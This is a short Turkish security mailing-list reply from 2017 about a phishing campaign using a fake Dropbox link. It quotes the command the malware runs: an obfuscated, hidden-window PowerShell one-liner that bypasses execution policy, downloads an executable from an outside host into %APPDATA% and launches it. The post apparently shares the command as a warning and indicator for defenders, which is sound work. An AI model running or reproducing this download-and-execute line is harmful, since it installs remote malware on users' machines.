Re: [NetsecTR] Sahte Dropbox Linki

Serhat Erdogan Thu, 09 Mar 2017 02:30:14 -0800

Zararlı yazılım aşağıdaki komutu çalıştırıyor;

*CMd.Exe /c "PowerSHell.ExE     -eXEcuTiOnpOlicY    ByPaSs     -NOpROFILE
-WINDOwsTYLE HIdDEn    (NEW-ObjEct
sYStEM.net.wEBCLient).DoWnLOADfiLE('http://ltmp.nonflets.pl/file/hen.trf
<http://ltmp.nonflets.pl/file/hen.trf>','%APpDaTa%.eXe');StART-pRoceSS
'%aPPdaTA%.Exe'"*

-------------------------------------------------
Günlük pentest(sızma testi) teknik ipuçları - https://twitter.com/dailypentest


-------------------------------------------------

Re: [NetsecTR] Sahte Dropbox Linki

Cevap